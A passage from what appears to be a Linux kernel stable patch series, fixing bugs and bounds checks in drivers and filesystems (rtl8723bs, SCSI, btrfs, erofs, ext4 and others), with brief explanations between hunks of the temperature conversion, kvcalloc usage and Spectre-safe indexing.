++		ret = -EMSGSIZE;
+ 
+ 		goto err_free;
+ 	}
+@@ -151,7 +157,7 @@ static int dell_wmi_ddv_query_buffer(struct wmi_device *wdev, enum dell_ddv_meth
+ err_free:
+ 	kfree(obj);
+ 
+-	return -EIO;
++	return ret;
+ }
+ 
+ static int dell_wmi_ddv_query_string(struct wmi_device *wdev, enum dell_ddv_method method,
+@@ -185,7 +191,8 @@ static ssize_t temp_show(struct device *dev, struct device_attribute *attr, char
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return sysfs_emit(buf, "%d\n", DIV_ROUND_CLOSEST(value, 10));
++	/* Use 2731 instead of 2731.5 to avoid unnecessary rounding */
++	return sysfs_emit(buf, "%d\n", value - 2731);
+ }
+ 
+ static ssize_t eppid_show(struct device *dev, struct device_attribute *attr, char *buf)
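
The firmware value here appears to be in tenths of a kelvin, while the attribute reports tenths of a degree Celsius, so the conversion is a constant offset: 0 °C = 273.15 K = 2731.5 deci-kelvin, truncated to 2731 to keep the arithmetic integral, as the new comment notes. For a hypothetical reading of 3081:

	3081 - 2731 = 350   ->  reported as 35.0 degrees (exact value: 34.95)
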
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 12346e2297fdb..8e34bbf44d1f5 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -181,6 +181,7 @@ void scsi_remove_host(struct Scsi_Host *shost)
+ 	scsi_forget_host(shost);
+ 	mutex_unlock(&shost->scan_mutex);
+ 	scsi_proc_host_rm(shost);
++	scsi_proc_hostdir_rm(shost->hostt);
+ 
+ 	/*
+ 	 * New SCSI devices cannot be attached anymore because of the SCSI host
+@@ -340,6 +341,7 @@ static void scsi_host_dev_release(struct device *dev)
+ 	struct Scsi_Host *shost = dev_to_shost(dev);
+ 	struct device *parent = dev->parent;
+ 
++	/* In case scsi_remove_host() has not been called. */
+ 	scsi_proc_hostdir_rm(shost->hostt);
+ 
+ 	/* Wait for functions invoked through call_rcu(&scmd->rcu, ...) */
+diff --git a/drivers/scsi/megaraid/megaraid_sas.h b/drivers/scsi/megaraid/megaraid_sas.h
+index 4919ea54b8277..2ef9d41fc6f42 100644
+--- a/drivers/scsi/megaraid/megaraid_sas.h
++++ b/drivers/scsi/megaraid/megaraid_sas.h
+@@ -1519,6 +1519,8 @@ struct megasas_ctrl_info {
+ #define MEGASAS_MAX_LD_IDS			(MEGASAS_MAX_LD_CHANNELS * \
+ 						MEGASAS_MAX_DEV_PER_CHANNEL)
+ 
++#define MEGASAS_MAX_SUPPORTED_LD_IDS		240
++
+ #define MEGASAS_MAX_SECTORS                    (2*1024)
+ #define MEGASAS_MAX_SECTORS_IEEE		(2*128)
+ #define MEGASAS_DBG_LVL				1
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fp.c b/drivers/scsi/megaraid/megaraid_sas_fp.c
+index da1cad1ee1238..4463a538102ad 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fp.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fp.c
+@@ -358,7 +358,7 @@ u8 MR_ValidateMapInfo(struct megasas_instance *instance, u64 map_id)
+ 		ld = MR_TargetIdToLdGet(i, drv_map);
+ 
+ 		/* For non existing VDs, iterate to next VD*/
+-		if (ld >= (MAX_LOGICAL_DRIVES_EXT - 1))
++		if (ld >= MEGASAS_MAX_SUPPORTED_LD_IDS)
+ 			continue;
+ 
+ 		raid = MR_LdRaidGet(ld, drv_map);
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 47dafe6b8a66d..797d02a6613a6 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -2974,8 +2974,13 @@ static void sd_read_block_characteristics(struct scsi_disk *sdkp)
+ 	}
+ 
+ 	if (sdkp->device->type == TYPE_ZBC) {
+-		/* Host-managed */
++		/*
++		 * Host-managed: Per ZBC and ZAC specifications, writes in
++		 * sequential write required zones of host-managed devices must
++		 * be aligned to the device physical block size.
++		 */
+ 		disk_set_zoned(sdkp->disk, BLK_ZONED_HM);
++		blk_queue_zone_write_granularity(q, sdkp->physical_block_size);
+ 	} else {
+ 		sdkp->zoned = zoned;
+ 		if (sdkp->zoned == 1) {
+diff --git a/drivers/scsi/sd_zbc.c b/drivers/scsi/sd_zbc.c
+index 62abebbaf2e7e..d33da6e1910f8 100644
+--- a/drivers/scsi/sd_zbc.c
++++ b/drivers/scsi/sd_zbc.c
+@@ -963,14 +963,6 @@ int sd_zbc_read_zones(struct scsi_disk *sdkp, u8 buf[SD_BUF_SIZE])
+ 	disk_set_max_active_zones(disk, 0);
+ 	nr_zones = round_up(sdkp->capacity, zone_blocks) >> ilog2(zone_blocks);
+ 
+-	/*
+-	 * Per ZBC and ZAC specifications, writes in sequential write required
+-	 * zones of host-managed devices must be aligned to the device physical
+-	 * block size.
+-	 */
+-	if (blk_queue_zoned_model(q) == BLK_ZONED_HM)
+-		blk_queue_zone_write_granularity(q, sdkp->physical_block_size);
+-
+ 	sdkp->early_zone_info.nr_zones = nr_zones;
+ 	sdkp->early_zone_info.zone_blocks = zone_blocks;
+ 
+diff --git a/drivers/staging/rtl8723bs/include/rtw_security.h b/drivers/staging/rtl8723bs/include/rtw_security.h
+index a68b738584623..7587fa8885274 100644
+--- a/drivers/staging/rtl8723bs/include/rtw_security.h
++++ b/drivers/staging/rtl8723bs/include/rtw_security.h
+@@ -107,13 +107,13 @@ struct security_priv {
+ 
+ 	u32 dot118021XGrpPrivacy;	/*  This specify the privacy algthm. used for Grp key */
+ 	u32 dot118021XGrpKeyid;		/*  key id used for Grp Key (tx key index) */
+-	union Keytype	dot118021XGrpKey[BIP_MAX_KEYID];	/*  802.1x Group Key, for inx0 and inx1 */
+-	union Keytype	dot118021XGrptxmickey[BIP_MAX_KEYID];
+-	union Keytype	dot118021XGrprxmickey[BIP_MAX_KEYID];
++	union Keytype	dot118021XGrpKey[BIP_MAX_KEYID + 1];	/*  802.1x Group Key, for inx0 and inx1 */
++	union Keytype	dot118021XGrptxmickey[BIP_MAX_KEYID + 1];
++	union Keytype	dot118021XGrprxmickey[BIP_MAX_KEYID + 1];
+ 	union pn48		dot11Grptxpn;			/*  PN48 used for Grp Key xmit. */
+ 	union pn48		dot11Grprxpn;			/*  PN48 used for Grp Key recv. */
+ 	u32 dot11wBIPKeyid;						/*  key id used for BIP Key (tx key index) */
+-	union Keytype	dot11wBIPKey[6];		/*  BIP Key, for index4 and index5 */
++	union Keytype	dot11wBIPKey[BIP_MAX_KEYID + 1];	/*  BIP Key, for index4 and index5 */
+ 	union pn48		dot11wBIPtxpn;			/*  PN48 used for Grp Key xmit. */
+ 	union pn48		dot11wBIPrxpn;			/*  PN48 used for Grp Key recv. */
+ 
+diff --git a/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c b/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
+index 54004f846cf0f..84a9f4dd8f954 100644
+--- a/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
++++ b/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
+@@ -350,7 +350,7 @@ int rtw_cfg80211_check_bss(struct adapter *padapter)
+ 	bss = cfg80211_get_bss(padapter->rtw_wdev->wiphy, notify_channel,
+ 			pnetwork->mac_address, pnetwork->ssid.ssid,
+ 			pnetwork->ssid.ssid_length,
+-			WLAN_CAPABILITY_ESS, WLAN_CAPABILITY_ESS);
++			IEEE80211_BSS_TYPE_ANY, IEEE80211_PRIVACY_ANY);
+ 
+ 	cfg80211_put_bss(padapter->rtw_wdev->wiphy, bss);
+ 
+@@ -711,6 +711,7 @@ exit:
+ static int rtw_cfg80211_set_encryption(struct net_device *dev, struct ieee_param *param, u32 param_len)
+ {
+ 	int ret = 0;
++	u8 max_idx;
+ 	u32 wep_key_idx, wep_key_len;
+ 	struct adapter *padapter = rtw_netdev_priv(dev);
+ 	struct mlme_priv *pmlmepriv = &padapter->mlmepriv;
+@@ -724,26 +725,29 @@ static int rtw_cfg80211_set_encryption(struct net_device *dev, struct ieee_param
+ 		goto exit;
+ 	}
+ 
+-	if (param->sta_addr[0] == 0xff && param->sta_addr[1] == 0xff &&
+-	    param->sta_addr[2] == 0xff && param->sta_addr[3] == 0xff &&
+-	    param->sta_addr[4] == 0xff && param->sta_addr[5] == 0xff) {
+-		if (param->u.crypt.idx >= WEP_KEYS
+-			|| param->u.crypt.idx >= BIP_MAX_KEYID) {
+-			ret = -EINVAL;
+-			goto exit;
+-		}
+-	} else {
+-		{
++	if (param->sta_addr[0] != 0xff || param->sta_addr[1] != 0xff ||
++	    param->sta_addr[2] != 0xff || param->sta_addr[3] != 0xff ||
++	    param->sta_addr[4] != 0xff || param->sta_addr[5] != 0xff) {
+ 		ret = -EINVAL;
+ 		goto exit;
+ 	}
++
++	if (strcmp(param->u.crypt.alg, "WEP") == 0)
++		max_idx = WEP_KEYS - 1;
++	else
++		max_idx = BIP_MAX_KEYID;
++
++	if (param->u.crypt.idx > max_idx) {
++		netdev_err(dev, "Error crypt.idx %d > %d\n", param->u.crypt.idx, max_idx);
++		ret = -EINVAL;
++		goto exit;
+ 	}
+ 
+ 	if (strcmp(param->u.crypt.alg, "WEP") == 0) {
+ 		wep_key_idx = param->u.crypt.idx;
+ 		wep_key_len = param->u.crypt.key_len;
+ 
+-		if ((wep_key_idx >= WEP_KEYS) || (wep_key_len <= 0)) {
++		if (wep_key_len <= 0) {
+ 			ret = -EINVAL;
+ 			goto exit;
+ 		}
+@@ -1135,8 +1139,8 @@ void rtw_cfg80211_unlink_bss(struct adapter *padapter, struct wlan_network *pnet
+ 
+ 	bss = cfg80211_get_bss(wiphy, NULL/*notify_channel*/,
+ 		select_network->mac_address, select_network->ssid.ssid,
+-		select_network->ssid.ssid_length, 0/*WLAN_CAPABILITY_ESS*/,
+-		0/*WLAN_CAPABILITY_ESS*/);
++		select_network->ssid.ssid_length, IEEE80211_BSS_TYPE_ANY,
++		IEEE80211_PRIVACY_ANY);
+ 
+ 	if (bss) {
+ 		cfg80211_unlink_bss(wiphy, bss);
+diff --git a/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c b/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
+index 30374a820496e..40a3157fb7359 100644
+--- a/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
++++ b/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
+@@ -46,6 +46,7 @@ static int wpa_set_auth_algs(struct net_device *dev, u32 value)
+ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param, u32 param_len)
+ {
+ 	int ret = 0;
++	u8 max_idx;
+ 	u32 wep_key_idx, wep_key_len, wep_total_len;
+ 	struct ndis_802_11_wep	 *pwep = NULL;
+ 	struct adapter *padapter = rtw_netdev_priv(dev);
+@@ -60,19 +61,22 @@ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param,
+ 		goto exit;
+ 	}
+ 
+-	if (param->sta_addr[0] == 0xff && param->sta_addr[1] == 0xff &&
+-	    param->sta_addr[2] == 0xff && param->sta_addr[3] == 0xff &&
+-	    param->sta_addr[4] == 0xff && param->sta_addr[5] == 0xff) {
+-		if (param->u.crypt.idx >= WEP_KEYS ||
+-		    param->u.crypt.idx >= BIP_MAX_KEYID) {
+-			ret = -EINVAL;
+-			goto exit;
+-		}
+-	} else {
+-		{
+-			ret = -EINVAL;
+-			goto exit;
+-		}
++	if (param->sta_addr[0] != 0xff || param->sta_addr[1] != 0xff ||
++	    param->sta_addr[2] != 0xff || param->sta_addr[3] != 0xff ||
++	    param->sta_addr[4] != 0xff || param->sta_addr[5] != 0xff) {
++		ret = -EINVAL;
++		goto exit;
++	}
++
++	if (strcmp(param->u.crypt.alg, "WEP") == 0)
++		max_idx = WEP_KEYS - 1;
++	else
++		max_idx = BIP_MAX_KEYID;
++
++	if (param->u.crypt.idx > max_idx) {
++		netdev_err(dev, "Error crypt.idx %d > %d\n", param->u.crypt.idx, max_idx);
++		ret = -EINVAL;
++		goto exit;
+ 	}
+ 
+ 	if (strcmp(param->u.crypt.alg, "WEP") == 0) {
+@@ -84,9 +88,6 @@ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param,
+ 		wep_key_idx = param->u.crypt.idx;
+ 		wep_key_len = param->u.crypt.key_len;
+ 
+-		if (wep_key_idx > WEP_KEYS)
+-			return -EINVAL;
+-
+ 		if (wep_key_len > 0) {
+ 			wep_key_len = wep_key_len <= 5 ? 5 : 13;
+ 			wep_total_len = wep_key_len + FIELD_OFFSET(struct ndis_802_11_wep, key_material);
+diff --git a/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c b/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
+index bf1b1cdfade4a..acc11ad569758 100644
+--- a/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
++++ b/drivers/thermal/intel/int340x_thermal/processor_thermal_device_pci.c
+@@ -194,7 +194,6 @@ static int sys_set_trip_temp(struct thermal_zone_device *tzd, int trip, int temp
+ 	proc_thermal_mmio_write(pci_info, PROC_THERMAL_MMIO_THRES_0, _temp);
+ 	proc_thermal_mmio_write(pci_info, PROC_THERMAL_MMIO_INT_ENABLE_0, 1);
+ 
+-	thermal_zone_device_enable(tzd);
+ 	pci_info->stored_thres = temp;
+ 
+ 	return 0;
+@@ -277,6 +276,10 @@ static int proc_thermal_pci_probe(struct pci_dev *pdev, const struct pci_device_
+ 		goto err_free_vectors;
+ 	}
+ 
++	ret = thermal_zone_device_enable(pci_info->tzone);
++	if (ret)
++		goto err_free_vectors;
++
+ 	return 0;
+ 
+ err_free_vectors:
+diff --git a/fs/btrfs/bio.c b/fs/btrfs/bio.c
+index 8affc88b0e0a4..e775d68834ea3 100644
+--- a/fs/btrfs/bio.c
++++ b/fs/btrfs/bio.c
+@@ -72,7 +72,7 @@ static void btrfs_log_dev_io_error(struct bio *bio, struct btrfs_device *dev)
+ 
+ 	if (btrfs_op(bio) == BTRFS_MAP_WRITE)
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_WRITE_ERRS);
+-	if (!(bio->bi_opf & REQ_RAHEAD))
++	else if (!(bio->bi_opf & REQ_RAHEAD))
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_READ_ERRS);
+ 	if (bio->bi_opf & REQ_PREFLUSH)
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_FLUSH_ERRS);
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 708d843daa72d..d628d545ffea7 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1687,7 +1687,8 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 
+ 		btrfs_info(fs_info,
+ 			"reclaiming chunk %llu with %llu%% used %llu%% unusable",
+-				bg->start, div_u64(bg->used * 100, bg->length),
++				bg->start,
++				div64_u64(bg->used * 100, bg->length),
+ 				div64_u64(zone_unusable * 100, bg->length));
+ 		trace_btrfs_reclaim_block_group(bg);
+ 		ret = btrfs_relocate_chunk(fs_info, bg->start);
+@@ -2349,18 +2350,29 @@ static int insert_block_group_item(struct btrfs_trans_handle *trans,
+ 	struct btrfs_block_group_item bgi;
+ 	struct btrfs_root *root = btrfs_block_group_root(fs_info);
+ 	struct btrfs_key key;
++	u64 old_commit_used;
++	int ret;
+ 
+ 	spin_lock(&block_group->lock);
+ 	btrfs_set_stack_block_group_used(&bgi, block_group->used);
+ 	btrfs_set_stack_block_group_chunk_objectid(&bgi,
+ 						   block_group->global_root_id);
+ 	btrfs_set_stack_block_group_flags(&bgi, block_group->flags);
++	old_commit_used = block_group->commit_used;
++	block_group->commit_used = block_group->used;
+ 	key.objectid = block_group->start;
+ 	key.type = BTRFS_BLOCK_GROUP_ITEM_KEY;
+ 	key.offset = block_group->length;
+ 	spin_unlock(&block_group->lock);
+ 
+-	return btrfs_insert_item(trans, root, &key, &bgi, sizeof(bgi));
++	ret = btrfs_insert_item(trans, root, &key, &bgi, sizeof(bgi));
++	if (ret < 0) {
++		spin_lock(&block_group->lock);
++		block_group->commit_used = old_commit_used;
++		spin_unlock(&block_group->lock);
++	}
++
++	return ret;
+ }
+ 
+ static int insert_dev_extent(struct btrfs_trans_handle *trans,
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index be94030e1dfbf..138afa955370b 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -763,7 +763,13 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 			goto next;
+ 		}
+ 
++		flags = em->flags;
+ 		clear_bit(EXTENT_FLAG_PINNED, &em->flags);
++		/*
++		 * In case we split the extent map, we want to preserve the
++		 * EXTENT_FLAG_LOGGING flag on our extent map, but we don't want
++		 * it on the new extent maps.
++		 */
+ 		clear_bit(EXTENT_FLAG_LOGGING, &flags);
+ 		modified = !list_empty(&em->list);
+ 
+@@ -774,7 +780,6 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 		if (em->start >= start && em_end <= end)
+ 			goto remove_em;
+ 
+-		flags = em->flags;
+ 		gen = em->generation;
+ 		compressed = test_bit(EXTENT_FLAG_COMPRESSED, &em->flags);
+ 
+diff --git a/fs/erofs/decompressor_lzma.c b/fs/erofs/decompressor_lzma.c
+index 091fd5adf818f..5cd612a8f8584 100644
+--- a/fs/erofs/decompressor_lzma.c
++++ b/fs/erofs/decompressor_lzma.c
+@@ -278,7 +278,7 @@ again:
+ 		}
+ 	}
+ 	if (no < nrpages_out && strm->buf.out)
+-		kunmap(rq->in[no]);
++		kunmap(rq->out[no]);
+ 	if (ni < nrpages_in)
+ 		kunmap(rq->in[ni]);
+ 	/* 4. push back LZMA stream context to the global list */
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 5200bb86e2643..ccf7c55d477fe 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -1032,12 +1032,12 @@ static int z_erofs_decompress_pcluster(struct z_erofs_decompress_backend *be,
+ 
+ 	if (!be->decompressed_pages)
+ 		be->decompressed_pages =
+-			kcalloc(be->nr_pages, sizeof(struct page *),
+-				GFP_KERNEL | __GFP_NOFAIL);
++			kvcalloc(be->nr_pages, sizeof(struct page *),
++				 GFP_KERNEL | __GFP_NOFAIL);
+ 	if (!be->compressed_pages)
+ 		be->compressed_pages =
+-			kcalloc(pclusterpages, sizeof(struct page *),
+-				GFP_KERNEL | __GFP_NOFAIL);
++			kvcalloc(pclusterpages, sizeof(struct page *),
++				 GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	z_erofs_parse_out_bvecs(be);
+ 	err2 = z_erofs_parse_in_bvecs(be, &overlapped);
+@@ -1085,7 +1085,7 @@ out:
+ 	}
+ 	if (be->compressed_pages < be->onstack_pages ||
+ 	    be->compressed_pages >= be->onstack_pages + Z_EROFS_ONSTACK_PAGES)
+-		kfree(be->compressed_pages);
++		kvfree(be->compressed_pages);
+ 	z_erofs_fill_other_copies(be, err);
+ 
+ 	for (i = 0; i < be->nr_pages; ++i) {
+@@ -1104,7 +1104,7 @@ out:
+ 	}
+ 
+ 	if (be->decompressed_pages != be->onstack_pages)
+-		kfree(be->decompressed_pages);
++		kvfree(be->decompressed_pages);
+ 
+ 	pcl->length = 0;
+ 	pcl->partial = true;
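
kvcalloc() tries kmalloc first and falls back to vmalloc when the request is large or memory is fragmented, which suits these per-pcluster page arrays whose size scales with the cluster; the matching rule is that such buffers must be released with kvfree(), as the hunk above also converts. A minimal sketch:

#include <linux/slab.h>
#include <linux/mm.h>

static struct page **alloc_page_array(unsigned int nr)
{
	/* may be kmalloc- or vmalloc-backed; always pair with kvfree() */
	return kvcalloc(nr, sizeof(struct page *), GFP_KERNEL);
}
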
+diff --git a/fs/ext4/fsmap.c b/fs/ext4/fsmap.c
+index 4493ef0c715e9..cdf9bfe10137f 100644
+--- a/fs/ext4/fsmap.c
++++ b/fs/ext4/fsmap.c
+@@ -486,6 +486,8 @@ static int ext4_getfsmap_datadev(struct super_block *sb,
+ 		keys[0].fmr_physical = bofs;
+ 	if (keys[1].fmr_physical >= eofs)
+ 		keys[1].fmr_physical = eofs - 1;
++	if (keys[1].fmr_physical < keys[0].fmr_physical)
++		return 0;
+ 	start_fsb = keys[0].fmr_physical;
+ 	end_fsb = keys[1].fmr_physical;
+ 
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index 2b42ececa46d8..1602d74b5eeb3 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -159,7 +159,6 @@ int ext4_find_inline_data_nolock(struct inode *inode)
+ 					(void *)ext4_raw_inode(&is.iloc));
+ 		EXT4_I(inode)->i_inline_size = EXT4_MIN_INLINE_DATA_SIZE +
+ 				le32_to_cpu(is.s.here->e_value_size);
+-		ext4_set_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA);
+ 	}
+ out:
+ 	brelse(is.iloc.bh);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 9d9f414f99fec..96517785a9f89 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -4797,8 +4797,13 @@ static inline int ext4_iget_extra_inode(struct inode *inode,
+ 
+ 	if (EXT4_INODE_HAS_XATTR_SPACE(inode)  &&
+ 	    *magic == cpu_to_le32(EXT4_XATTR_MAGIC)) {
++		int err;
++
+ 		ext4_set_inode_state(inode, EXT4_STATE_XATTR);
+-		return ext4_find_inline_data_nolock(inode);
++		err = ext4_find_inline_data_nolock(inode);
++		if (!err && ext4_has_inline_data(inode))
++			ext4_set_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA);
++		return err;
+ 	} else
+ 		EXT4_I(inode)->i_inline_off = 0;
+ 	return 0;
+diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
+index 8067ccda34e45..8c2b1ff5e6959 100644
+--- a/fs/ext4/ioctl.c
++++ b/fs/ext4/ioctl.c
+@@ -434,6 +434,7 @@ static long swap_inode_boot_loader(struct super_block *sb,
+ 		ei_bl->i_flags = 0;
+ 		inode_set_iversion(inode_bl, 1);
+ 		i_size_write(inode_bl, 0);
++		EXT4_I(inode_bl)->i_disksize = inode_bl->i_size;
+ 		inode_bl->i_mode = S_IFREG;
+ 		if (ext4_has_feature_extents(sb)) {
+ 			ext4_set_inode_flag(inode_bl, EXT4_INODE_EXTENTS);
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index dd28453d6ea32..7cc3918e2f189 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -1595,11 +1595,10 @@ static struct buffer_head *__ext4_find_entry(struct inode *dir,
+ 		int has_inline_data = 1;
+ 		ret = ext4_find_inline_entry(dir, fname, res_dir,
+ 					     &has_inline_data);
+-		if (has_inline_data) {
+-			if (inlined)
+-				*inlined = 1;
++		if (inlined)
++			*inlined = has_inline_data;
++		if (has_inline_data)
+ 			goto cleanup_and_exit;
+-		}
+ 	}
+ 
+ 	if ((namelen <= 2) && (name[0] == '.') &&
+@@ -3646,7 +3645,8 @@ static void ext4_resetent(handle_t *handle, struct ext4_renament *ent,
+ 	 * so the old->de may no longer valid and need to find it again
+ 	 * before reset old inode info.
+ 	 */
+-	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de, NULL);
++	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
++				 &old.inlined);
+ 	if (IS_ERR(old.bh))
+ 		retval = PTR_ERR(old.bh);
+ 	if (!old.bh)
+@@ -3813,9 +3813,20 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			return retval;
+ 	}
+ 
+-	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de, NULL);
+-	if (IS_ERR(old.bh))
+-		return PTR_ERR(old.bh);
++	/*
++	 * We need to protect against the old.inode directory being converted
++	 * from inline directory format into a normal one.
++	 */
++	if (S_ISDIR(old.inode->i_mode))
++		inode_lock_nested(old.inode, I_MUTEX_NONDIR2);
++
++	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
++				 &old.inlined);
++	if (IS_ERR(old.bh)) {
++		retval = PTR_ERR(old.bh);
++		goto unlock_moved_dir;
++	}
++
+ 	/*
+ 	 *  Check for inode number is _not_ due to possible IO errors.
+ 	 *  We might rmdir the source, keep it as pwd of some process
+@@ -3873,8 +3884,10 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 				goto end_rename;
+ 		}
+ 		retval = ext4_rename_dir_prepare(handle, &old);
+-		if (retval)
++		if (retval) {
++			inode_unlock(old.inode);
+ 			goto end_rename;
++		}
+ 	}
+ 	/*
+ 	 * If we're renaming a file within an inline_data dir and adding or
+@@ -4010,6 +4023,11 @@ release_bh:
+ 	brelse(old.dir_bh);
+ 	brelse(old.bh);
+ 	brelse(new.bh);
++
++unlock_moved_dir:
++	if (S_ISDIR(old.inode->i_mode))
++		inode_unlock(old.inode);
++
+ 	return retval;
+ }
+ 
+diff --git a/fs/ext4/page-io.c b/fs/ext4/page-io.c
+index beaec6d81074a..1e4db96a04e63 100644
+--- a/fs/ext4/page-io.c
++++ b/fs/ext4/page-io.c
+@@ -409,7 +409,8 @@ static void io_submit_init_bio(struct ext4_io_submit *io,
+ 
+ static void io_submit_add_bh(struct ext4_io_submit *io,
+ 			     struct inode *inode,
+-			     struct page *page,
++			     struct page *pagecache_page,
++			     struct page *bounce_page,
+ 			     struct buffer_head *bh)
+ {
+ 	int ret;
+@@ -421,10 +422,11 @@ submit_and_retry:
+ 	}
+ 	if (io->io_bio == NULL)
+ 		io_submit_init_bio(io, bh);
+-	ret = bio_add_page(io->io_bio, page, bh->b_size, bh_offset(bh));
++	ret = bio_add_page(io->io_bio, bounce_page ?: pagecache_page,
++			   bh->b_size, bh_offset(bh));
+ 	if (ret != bh->b_size)
+ 		goto submit_and_retry;
+-	wbc_account_cgroup_owner(io->io_wbc, page, bh->b_size);
++	wbc_account_cgroup_owner(io->io_wbc, pagecache_page, bh->b_size);
+ 	io->io_next_block++;
+ }
+ 
+@@ -561,8 +563,7 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 	do {
+ 		if (!buffer_async_write(bh))
+ 			continue;
+-		io_submit_add_bh(io, inode,
+-				 bounce_page ? bounce_page : page, bh);
++		io_submit_add_bh(io, inode, page, bounce_page, bh);
+ 	} while ((bh = bh->b_this_page) != head);
+ unlock:
+ 	unlock_page(page);
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 0c6b011a91b3f..494994d9a332b 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2807,6 +2807,9 @@ shift:
+ 			(void *)header, total_ino);
+ 	EXT4_I(inode)->i_extra_isize = new_extra_isize;
+ 
++	if (ext4_has_inline_data(inode))
++		error = ext4_find_inline_data_nolock(inode);
++
+ cleanup:
+ 	if (error && (mnt_count != le16_to_cpu(sbi->s_es->s_mnt_count))) {
+ 		ext4_warning(inode->i_sb, "Unable to expand inode %lu. Delete some EAs or run e2fsck.",
+diff --git a/fs/file.c b/fs/file.c
+index c942c89ca4cda..7893ea161d770 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -642,6 +642,7 @@ static struct file *pick_file(struct files_struct *files, unsigned fd)
+ 	if (fd >= fdt->max_fds)
+ 		return NULL;
+ 
++	fd = array_index_nospec(fd, fdt->max_fds);
+ 	file = fdt->fd[fd];
+ 	if (file) {
+ 		rcu_assign_pointer(fdt->fd[fd], NULL);
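
array_index_nospec() clamps an index on the speculative path, so a bounds check the CPU mispredicts past cannot be abused to read out of bounds (Spectre v1). The idiom is check, then sanitize, then index, sketched here with hypothetical names:

#include <linux/nospec.h>

static int table_get(const int *table, unsigned int nr, unsigned int idx)
{
	if (idx >= nr)			/* architectural bounds check */
		return -EINVAL;
	idx = array_index_nospec(idx, nr);	/* clamp under speculation too */
	return table[idx];
}
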
+diff --git a/fs/locks.c b/fs/locks.c
+index 8f01bee177159..8a881cda3dd2a 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -1862,9 +1862,10 @@ int generic_setlease(struct file *filp, long arg, struct file_lock **flp,
+ 			void **priv)
+ {
+ 	struct inode *inode = locks_inode(filp);
++	vfsuid_t vfsuid = i_uid_into_vfsuid(file_mnt_user_ns(filp), inode);
+ 	int error;
+ 
+-	if ((!uid_eq(current_fsuid(), inode->i_uid)) && !capable(CAP_LEASE))
++	if ((!vfsuid_eq_kuid(vfsuid, current_fsuid())) && !capable(CAP_LEASE))
+ 		return -EACCES;
+ 	if (!S_ISREG(inode->i_mode))
+ 		return -EINVAL;
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 4c3a0d84043c9..bb1e85586dfdd 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -1100,7 +1100,9 @@ nfsd_vfs_write(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
+ 	since = READ_ONCE(file->f_wb_err);
+ 	if (verf)
+ 		nfsd_copy_write_verifier(verf, nn);
++	file_start_write(file);
+ 	host_err = vfs_iter_write(file, &iter, &pos, flags);
++	file_end_write(file);
+ 	if (host_err < 0) {
+ 		nfsd_reset_write_verifier(nn);
+ 		trace_nfsd_writeverf_reset(nn, rqstp, host_err);
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index a1af2c2e1c295..7faa0a5af0260 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
